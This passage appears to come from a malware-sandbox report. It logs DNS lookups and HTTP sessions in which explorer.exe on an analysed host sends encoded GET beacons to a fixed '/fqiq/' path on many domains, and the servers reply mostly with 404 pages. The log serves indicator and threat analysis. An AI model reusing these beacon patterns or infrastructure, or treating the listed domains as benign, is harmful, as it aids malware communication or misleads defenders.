Oct 27, 2021 19:14:35.913027048 CEST | 192.168.2.3 | 8.8.8.8 | 0x82d0 | Standard query (0) | www.sosoon.store | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:41.296065092 CEST | 192.168.2.3 | 8.8.8.8 | 0x9466 | Standard query (0) | www.esyscoloradosprings.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:46.738342047 CEST | 192.168.2.3 | 8.8.8.8 | 0xff22 | Standard query (0) | www.creationslazzaroni.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:51.773514032 CEST | 192.168.2.3 | 8.8.8.8 | 0xacdd | Standard query (0) | www.24000words.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:57.447910070 CEST | 192.168.2.3 | 8.8.8.8 | 0xd480 | Standard query (0) | www.healthyweekendtips.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:07.595096111 CEST | 192.168.2.3 | 8.8.8.8 | 0x1121 | Standard query (0) | www.thedusi.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:12.819777966 CEST | 192.168.2.3 | 8.8.8.8 | 0x87b4 | Standard query (0) | www.mask60.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:18.369975090 CEST | 192.168.2.3 | 8.8.8.8 | 0x4685 | Standard query (0) | www.qywyfeo8.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 27, 2021 19:14:12.846904039 CEST | 8.8.8.8 | 192.168.2.3 | 0x44db | No error (0) | www.isshinn1.com | - | 157.7.107.193 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:19.019355059 CEST | 8.8.8.8 | 192.168.2.3 | 0x40d | No error (0) | www.rdoi.top | - | 104.233.161.241 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:24.800334930 CEST | 8.8.8.8 | 192.168.2.3 | 0xe7e1 | No error (0) | www.megacinema.club | megacinema.club | - | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:14:24.800334930 CEST | 8.8.8.8 | 192.168.2.3 | 0xe7e1 | No error (0) | megacinema.club | - | 45.93.101.51 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:30.315530062 CEST | 8.8.8.8 | 192.168.2.3 | 0x9895 | No error (0) | www.passiverewardssystems.com | - | 203.170.80.253 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:35.937032938 CEST | 8.8.8.8 | 192.168.2.3 | 0x82d0 | No error (0) | www.sosoon.store | - | 18.118.119.183 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:41.403433084 CEST | 8.8.8.8 | 192.168.2.3 | 0x9466 | No error (0) | www.esyscoloradosprings.com | websites076.homestead.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:14:41.403433084 CEST | 8.8.8.8 | 192.168.2.3 | 0x9466 | No error (0) | websites076.homestead.com | - | 108.167.135.122 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:46.759346008 CEST | 8.8.8.8 | 192.168.2.3 | 0xff22 | Name error (3) | www.creationslazzaroni.com | none | none | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:51.955020905 CEST | 8.8.8.8 | 192.168.2.3 | 0xacdd | No error (0) | www.24000words.com | - | 156.240.150.22 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:57.469948053 CEST | 8.8.8.8 | 192.168.2.3 | 0xd480 | No error (0) | www.healthyweekendtips.com | - | 172.67.216.2 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:14:57.469948053 CEST | 8.8.8.8 | 192.168.2.3 | 0xd480 | No error (0) | www.healthyweekendtips.com | - | 104.21.78.41 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:07.616633892 CEST | 8.8.8.8 | 192.168.2.3 | 0x1121 | No error (0) | www.thedusi.com | thedusi.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:15:07.616633892 CEST | 8.8.8.8 | 192.168.2.3 | 0x1121 | No error (0) | thedusi.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:12.840934992 CEST | 8.8.8.8 | 192.168.2.3 | 0x87b4 | No error (0) | www.mask60.com | mask60.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:15:12.840934992 CEST | 8.8.8.8 | 192.168.2.3 | 0x87b4 | No error (0) | mask60.com | - | 116.212.126.191 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:15:18.393908978 CEST | 8.8.8.8 | 192.168.2.3 | 0x4685 | Name error (3) | www.qywyfeo8.xyz | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.isshinn1.com
• www.rdoi.top
• www.megacinema.club
• www.passiverewardssystems.com
• www.sosoon.store
• www.esyscoloradosprings.com
• www.24000words.com
• www.healthyweekendtips.com
• www.thedusi.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49776 | 157.7.107.193 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 27, 2021 19:14:13.138565063 CEST | 1814 | OUT | GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1
    Host: www.isshinn1.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Oct 27, 2021 19:14:13.425698996 CEST | 1840 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 27 Oct 2021 17:14:13 GMT
    Content-Type: text/html
    Content-Length: 19220
    Connection: close
    Server: Apache
    Last-Modified: Mon, 23 Jul 2018 06:31:26 GMT
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 
70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 63 61 70 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 0a 20 20 20 20 20
                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; font-weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex;
                                            Oct 27, 2021 19:14:13.425728083 CEST1842INData Raw: 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74
                                            Data Ascii: display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center;
                                            Oct 27, 2021 19:14:13.425744057 CEST1843INData Raw: 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65
                                            Data Ascii: middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                            Oct 27, 2021 19:14:13.425762892 CEST1844INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 2d 68 6f 6c 69 7a 6f 6e 74 61 6c 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 68
                                            Data Ascii: } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline
                                            Oct 27, 2021 19:14:13.425780058 CEST1846INData Raw: 2e 39 2d 31 32 2e 30 34 68 2d 2e 33 32 39 63 2d 31 34 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 30 2e 37 34
                                            Data Ascii: .9-12.04h-.329c-14.1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.056-8.
                                            Oct 27, 2021 19:14:13.425795078 CEST1847INData Raw: 31 2d 31 2e 35 38 68 31 36 2e 35 32 31 63 2e 38 38 37 2d 2e 30 30 31 20 31 2e 36 34 33 2e 36 34 34 20 31 2e 37 38 31 20 31 2e 35 32 6c 32 2e 39 39 32 20 32 33 2e 39 37 32 63 2e 30 35 34 2e 35 36 31 2d 2e 31 35 36 20 31 2e 31 31 36 2d 2e 35 36 39
                                            Data Ascii: 1-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16
                                            Oct 27, 2021 19:14:13.426031113 CEST1849INData Raw: 37 33 36 20 32 32 2e 31 31 37 20 31 30 2e 38 32 31 20 33 34 2e 34 31 38 20 31 30 2e 35 33 35 2e 39 34 37 20 32 2e 33 36 33 20 31 2e 36 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e
                                            Data Ascii: 736 22.117 10.821 34.418 10.535.947 2.363 1.615 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.
                                            Oct 27, 2021 19:14:13.426050901 CEST1850INData Raw: 31 39 2e 33 36 34 2d 31 2e 39 35 39 2d 2e 30 37 38 2d 32 2e 33 33 36 2d 2e 39 39 32 2d 2e 33 37 37 2d 2e 39 31 34 2e 30 35 31 2d 31 2e 39 36 2e 39 35 39 2d 32 2e 33 34 39 20 32 2e 36 35 33 2d 31 2e 31 32 33 20 35 2e 37 31 39 2d 2e 35 38 31 20 37
                                            Data Ascii: 19.364-1.959-.078-2.336-.992-.377-.914.051-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="
                                            Oct 27, 2021 19:14:13.426067114 CEST1851INData Raw: 6c 2d 2e 31 35 38 2d 2e 32 33 38 63 2d 2e 33 37 32 2d 2e 35 33 37 2d 2e 37 34 2d 31 2e 31 30 38 2d 31 2e 31 32 33 2d 31 2e 37 32 34 6c 2d 2e 34 34 32 2d 2e 37 33 36 2d 2e 32 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39
                                            Data Ascii: l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-
                                            Oct 27, 2021 19:14:13.426088095 CEST1853INData Raw: 38 39 20 32 2e 31 36 2d 39 2e 38 38 32 20 36 2e 34 35 38 2d 35 2e 31 32 35 2d 31 33 2e 33 30 38 7a 6d 32 34 2e 32 31 31 20 36 2e 39 35 36 6c 2d 33 2e 33 37 36 2d 32 2e 32 34 32 20 31 30 2e 30 38 34 2d 39 2e 36 2e 36 38 31 2e 32 33 34 2e 32 35 34
                                            Data Ascii: 89 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.186-.622.485-.75.096-.036.198-.052.3-.047h.0
                                            Oct 27, 2021 19:14:13.706497908 CEST | 4257 | IN | Data Raw: 2d 35 2e 36 34 34 20 32 30 2e 33 32 32 2d 37 2e 38 35 36 2d 2e 30 32 36 20 31 2e 33 34 31 2e 30 32 34 20 32 2e 36 38 33 2e 31 35 20 34 2e 30 31 38 2e 33 36 36 20 36 2e 38 38 34 20 31 2e 36 37 35 20 31 33 2e 36 38 35 20 33 2e 38 39 31 20 32 30 2e
                                            Data Ascii: -5.644 20.322-7.856-.026 1.341.024 2.683.15 4.018.366 6.884 1.675 13.685 3.891 20.213 1.063 3.117 2.39 6.138 3.966 9.03.224.391.449.783.673 1.159l.554.9c.299.481.603.948.913 1.4l.209.316c.4.587.823 1.174 1.242 1.716.419.542.928 1.159 1.407 1.7


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.3 | 49786 | 104.233.161.241 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:19.347495079 CEST | 8036 | OUT | GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.rdoi.top
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:19.671010017 CEST | 8036 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 27 Oct 2021 17:14:19 GMT
                                            Server: Apache
                                            Content-Length: 258
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.3 | 49788 | 45.93.101.51 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:24.933825016 CEST | 9731 | OUT | GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1
                                            Host: www.megacinema.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:25.242954016 CEST | 9732 | IN | HTTP/1.1 404 Not Found
                                            Connection: close
                                            content-type: text/html
                                            last-modified: Tue, 09 Jul 2019 06:18:14 GMT
                                            etag: "999-5d2431a6-22b54e502ae80759;;;"
                                            accept-ranges: bytes
                                            content-length: 2457
                                            date: Wed, 27 Oct 2021 17:14:25 GMT
                                            server: LiteSpeed
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 
64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                            Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some
                                            Oct 27, 2021 19:14:25.242989063 CEST | 9734 | IN | Data Raw: 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65
                                            Data Ascii: thing lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxc
                                            Oct 27, 2021 19:14:25.243014097 CEST | 9734 | IN | Data Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: </div> </div></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            3 | 192.168.2.3 | 49789 | 203.170.80.253 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:30.605387926 CEST | 9735 | OUT | GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.passiverewardssystems.com
